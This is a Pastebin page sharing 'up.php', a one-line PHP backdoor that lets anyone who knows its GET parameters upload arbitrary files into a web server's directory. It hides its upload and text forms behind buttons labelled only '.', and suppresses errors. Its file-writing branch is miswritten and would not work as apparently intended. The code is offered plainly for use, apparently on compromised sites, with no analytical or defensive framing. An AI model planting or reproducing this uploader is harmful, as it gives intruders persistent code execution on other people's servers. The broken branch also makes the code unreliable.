Advertisement
PalmaSolutions

up.php

Aug 12th, 2019
222
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.40 KB | None | 0 0
  1. <?php if($_GET['l']){@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);};if($_POST['l']){file_put_contents('editor.php'||$_POST['l']);};if($_GET['s'])echo'<form action="?l=1" method="post" enctype="multipart/form-data"><input name="f" type="file"><input type="submit" value="."></form><form action="" method="post"><textarea name="l"></textarea><input type="submit" name="" value="." ></form>'; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement